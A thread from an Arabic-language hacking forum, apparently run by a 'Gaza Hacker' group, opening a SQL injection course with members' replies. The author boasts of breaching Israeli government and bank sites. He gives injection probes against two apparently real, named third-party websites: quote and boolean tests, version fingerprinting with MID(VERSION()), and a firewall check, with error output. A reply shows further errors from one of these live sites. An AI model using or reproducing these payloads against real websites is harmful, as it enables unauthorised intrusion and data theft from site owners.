تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية BlackRose
BlackRose
المشرف العام
BlackRose غير متواجد حالياً
 
رقم العضوية : 17559
تاريخ التسجيل : Feb 2011
مكان الإقامة :
عدد المشاركات : 3,241
عدد النقاط : 10
قوة التقييم :
Injector Boy
افتراضي المٌقدمة الأولي : دورة إختبار ثغرات حقن قواعد البيانات sqli الإحترافية لعام 2017/2018

كُتب : [ 08-06-2016 - 11:01 PM ]





السلام عليكم ورحمة الله وبركاتة

أهلا بجميع الأصدقاء إخوتي بشبكة غزة هاكر تيم


دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018

تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر حيثٌ قمت والفريق التابع له بإختراق أكبر المواقع الصهيونية موقع الكنست بنوك مواقع وزراء الخ .. عن طريق هذا الثغرة ولا تستبعد وجودها بأكبر المواقع العالمية عزيزي لكن مايفرق بين وجوده فى المواقع الكبيره عنها في المواقع الصغيرة هي فى نسبة الحماية ومدى إمكانية إستغلالها لا أكثر .

لذا سوف أقوم فى المستقبل القريب [الوقت الحالي] بنشر هذه الدورة الكبيرة في هذا المجال بصورة إحترافيه ومٌتاتبعه من حيثٌ الترتيب العملي والتقنية للمواد التعليمية

هذا الموضوع التقديمي الأول [ سوف يكون عبارة عن مٌقدمة للنٌقط الأساسيه المطلوب تعلٌّمها في هذا المجال ]



النٌقطة الأولى : إختبار وجود الثغرة






من أساسيات هذا المجال أن يكون لدي المٌختبر علم صحيح لعملية الإختبار حيث أن هذا الأمر من الأساسيات
التي لا غنى عنها وليس أمر هين كما سوف نرى بعد قليل فلا يستقل أحدكٌم بهذه النٌقطة ويغفل عن تعلمها


تقنيات إختبار وجود الثغرة من عدمها


1- إستخدام الرموز الثابته [رمز الكومة ' رمز الازدواج "]

2- إنشاء قيمة جديدة للمٌتغير

3- إستخدام المٌعاملات المنطقية


<
<
<


1- إستخدام الرموز الثابته [رمز الكومة ' رمز الإذدواج "]

من أساسيات إختبار وجود الثغره والعمل على إظهار الخطأ ضمن الموقع المٌستهدف بصورة ثابتة
عملية إضافة رمز الكومة ' بعد قيمة المٌتغير على النحو التالي :


كود PHP:
 www.plantandem.be/home.php?p=g&id=4




كما نٌلاحظ ظهر خطأ يدٌل على وجود الثغرة ضمن هذا الموقع جيد لكن هذا الأمر ليس ثابت وكٌل
المواقع المٌختبرة بإستخدام القيمة الرمزية كومة فقد يكون هنا عملية فلترة لها فلا يظهر خطأ
مع إستخدامها كما بالمثال التالي :


كود PHP:
https://jdclement.com/en/amis.php?id=73489' 






كما نٌلاحظ لم يظهر أي خطأ يدٌل على وجود الثغرة لكني سوف أعتقد أن الرمز كومة يقع تحت
الفلترة من باب الحماية لذه سوف أستخدم القيمة المٌضاعفة منها رمز الازدواج "



كود PHP:
https://jdclement.com/en/amis.php?id=73489" 




ظهر الخطأ الدال على وجود الثغرة بقاعدة البيانات وهذه هي النقطه الأولى
من أليات العمل على كشف وجود الثغرة



2- إنشاء قيمة جديدة للمٌتغير

إنشاء قيمة جديدة ضمن مٌتغير الموقع الثابت والمٌخزن ضمن الذاكرة سوف يجعل مردود الموقع كما لو
قٌمنا بزراعة عضو جديد بالجسم ليس مٌناسب سوف يرفضه كـ رد قعل طبيعي وهذا تمام ما سوف
يحدٌث مع الموقع لنٌتابع ونرى ما أقصد هٌنا

سوف أقوم بإدخل قيمة أبجدية لأحد الحروف الإنجليزية إلي قيمة المٌتغير 4 ونٌشاهد ما سوف يحدٌث


كود PHP:
 www.plantandem.be/home.php?p=g&id=4a 






الموقع يٌخبرنا بعدم وجود مٌتغير أو عمود يحمل القيمة 4a وهذا إن دل على شئ يدٌل على وجود الثغرة


Unknown column '4a' in 'where clause'


وهذا فقط يٌعتمد في حالة تفعيل خاصية الجٌمل النصية ضمن قاعدة البيانات لنرى مردود كهذا


3- إستخدام المٌعاملات المنطقية


المٌعاملات المنطقية تٌستخدم لعملية السؤال وإنتظار الرد من قاعدة البيانات ومن باب المٌقارنة
بين النتائج الظاهرة , والقيم المٌستخدمة لذلك هي القيم


+and+1=1

+and+1=2



كود PHP:
 www.plantandem.be/home.php?p=g&id=4+and+1=







في الحالة الأولي الصفحة ضمن الموقع تعمل بصورة جيدة بلا أية أخطاء



كود PHP:
www.plantandem.be/home.php?p=g&id=4+and+1=




وفي الحالة الثانية كما نٌلاحظ الصفحة تغيرت وظهرة فى صورة بيضاء مما دل على وجود الثغرة



النٌقطة الثانية : تقنية معرفة قيمة إصدار قاعدة البيانات





من الضروري جداً معرفة قيمة إصدار قاعدة البيانات قبل عملية الحقن الكامل للموقع المٌصاب
لأن كٌل الإصدارات التي قبل الإصدار الخامس لا تستخدم تقنية الـ information_schema
لتخزين البيانات ضمن قاعدة البيانات والتي نستطبع معها إستخدام الإستعلامات لإتمام عملية
الحقن بصورة صحيحة وفي حال كان الإصدار ما قبل الإصدار الخامس فلا توجد طريقة لعملية
حقن ناجحه بدون إستخدام تقنية التخمين على الجداول والإعمدة مما يستغرق وقت أطول وليس
مضمون معرفتهم بالتخمين , وبمعرفة قيمة إصدار القاعدة قبل الحقن سوف يجعلنا نقوم بالعملية
ببال مٌرتاح لعلمنا بسهولة الأمر بإستخدام الأوامر الجاهزة .


الإستعلامات المٌستخدمة لمعرفة قيمة إصدار قاعدة البيانات


كود PHP:

+AND MID(VERSION(),1,1) = '3'

كود PHP:
+AND MID(VERSION(),1,1) = '4'
كود PHP:
+AND MID(VERSION(),1,1) = '5'

وتٌضع هذه الإستعلامات بعد قيمة المٌتغير الرقمية للموقع الهدف على النحو التالي


كود PHP:
 www.plantandem.be/home.php?p=g&id=4+AND MID(VERSION(),1,1) = '3'



كود PHP:
 www.plantandem.be/home.php?p=g&id=4+AND MID(VERSION(),1,1) = '4'



كود PHP:
 www.plantandem.be/home.php?p=g&id=4+AND MID(VERSION(),1,1) = '5'




كما لاحظنا الصفحة قامت بالتحميل بصورة قطعية صحيحة فى حالة القيمة الرقمية خمسة 5 والتي
تعني أن إصدار قاعدة بيانات الموقع هى الإصدار الخامس من قواعد البيانات التي تستخدم
الـ information_schema



النٌقطة الثالثة : إختبار وجود حماية ضمن الموقع


هذا أمر أخر هام نقوم به قبل الخوض في عملية الحقن حتى لا نتفاجئ بوجود حماية توقف عملنا وقت إستخدام
الإستعلامات الغير مٌفلترة


الإستعلامات المٌستخدم لمعرفة وجود حماية ضمن الموقع


كود PHP:
+or+

في حالة وضع هذا الإستعلام بعد القيمة الرقمية لأي موقع مصاب وفي حالة وجود
حماية تحمي قاعدة البيانات سوف يظهر على الفور رسالة تدول على وجود
جدار الحماية الذي سوف يوقف هذا الإستعلام عن الإستمرار



كود PHP:
www.plantandem.be/home.php?p=g&id=4+or+







إلي هٌنا تنتهي المٌقدمة الأولي وتأتيكم المٌدمة التالية فى معا لاحق


تحياتي لكٌم جميعاً وفي شوق للقائكم مرة أٌخرة في أقرب وقت مٌمكن


توقيع : BlackRose

.:: فريق قراصنة غزة ::.


آخر تعديل بواسطة BlackRose ، 07-28-2017 الساعة 09:26 PM
رد مع إقتباس
2 أعضاء آرسلو آعجاب لـ BlackRose على المشاركة المفيدة:
komikaso (08-07-2016), xdvb (09-03-2017)
بياناتي
 رقم المشاركة : ( 2 )
komikaso

رقم العضوية : 60092
تاريخ التسجيل : Jul 2014
مكان الإقامة :
عدد المشاركات : 40
عدد النقاط : 10

komikaso غير متواجد حالياً

افتراضي

كُتب : [ 08-07-2016 - 12:37 AM ]


شكرا لمجهوداتك أخي

توقيع : komikaso

عاشت فلسطين حرة

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
beautifulmind

رقم العضوية : 66067
تاريخ التسجيل : Aug 2016
مكان الإقامة :
عدد المشاركات : 36
عدد النقاط : 10

beautifulmind غير متواجد حالياً

افتراضي

كُتب : [ 08-07-2016 - 02:12 AM ]


متابعين معك ان شاء الله
بس في اقتراح صغير
ممكن كل ما يصير كمية من المعلومات يكون فيها اختبار
وتدريب للأعضاء المبتدئين
حتى لو كان هناك اي مشكلة فهم او اي شي نتجاوزها بوقتها
مع الشكر والتقدير


توقيع : beautifulmind



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
beautifulmind

رقم العضوية : 66067
تاريخ التسجيل : Aug 2016
مكان الإقامة :
عدد المشاركات : 36
عدد النقاط : 10

beautifulmind غير متواجد حالياً

افتراضي

كُتب : [ 08-07-2016 - 02:25 AM ]


اخ بلاك
بس بالنسبة لتوضيح مسألة Filtered injection
الكود الأول (
or 1 = 1 ) من استخدمه عالموقع المضاف الموجود بالمثال يطلع (forbidden)
ومن استخدم الكود الثاني (
1 and 1 = 1 ) يطلع
(((
Erreur SQL !
SELECT id,gabarit FROM page WHERE id = 4 1 and 1 = 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 and 1 = 1' at line 1 )))

وهو المفروض يطلع ايضاً (
forbidden ) حسب الشرح الموجود
يرجى توضيح المسألة هل يوجد شئ خطاً
ام سقطت سهواً
مع الشكر والتقدير للجهود المبذولة



توقيع : beautifulmind



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
BlackRose
المشرف العام
رقم العضوية : 17559
تاريخ التسجيل : Feb 2011
مكان الإقامة :
عدد المشاركات : 3,241
عدد النقاط : 10

BlackRose غير متواجد حالياً

Injector Boy

افتراضي

كُتب : [ 08-07-2016 - 05:50 AM ]


شكؤا على الملاحظة اخ beautifulmind مفيش مشكله احذف الكود ده خالص 1 and 1 = 1 واشتفل بالتانى بس


توقيع : BlackRose

خبير الأمن والحماية ,قائد فريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI بالـ HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه , مٌحب للأنمي الياباني .
.
facebook.com/Melegy.GHI

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
MrKurd
المشرف العام
رقم العضوية : 62044
تاريخ التسجيل : Feb 2015
مكان الإقامة :
عدد المشاركات : 701
عدد النقاط : 10

MrKurd غير متواجد حالياً

Die But Don't Lie

افتراضي

كُتب : [ 08-07-2016 - 06:37 AM ]


مشكوور أخي متابع دوما , إن شاء الله يستفيد الكل


توقيع : MrKurd

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
MAX200

رقم العضوية : 58830
تاريخ التسجيل : Apr 2014
مكان الإقامة :
عدد المشاركات : 42
عدد النقاط : 10

MAX200 غير متواجد حالياً

افتراضي

كُتب : [ 09-25-2016 - 02:06 PM ]


طول عمرك اسد ومبدع واستاذى اللة يفتح عليك يا ملك الحقن ابداع ابداع


توقيع : MAX200

.:: فريق قراصنة غزة ::.

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
2017, 2018, للدَّورة, أساتِذة, أساسيات, لعام, المٌقدمة, المٌقدِّمة, الأولى, البيانات, الحقو, العمل, الإحترافية, ثغرات, دورة, حقن, sqli, إختبار, ومبادئ, قواعد


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
"بفأس الخليل" دراسة أصولية ونقدية لمناهج التلقي العلمي والتوصيف الكوني-2- ؛؛؛ x010 .:: قسم للتوعية الأمنية ::. 5 02-09-2014 05:10 PM
| خاص | أسماء ، رتب ، عمل ، مجرمي الحرب على قطاع غزه Casper .:: مدينة غزة ::. 3 10-02-2011 03:43 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 01:54 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @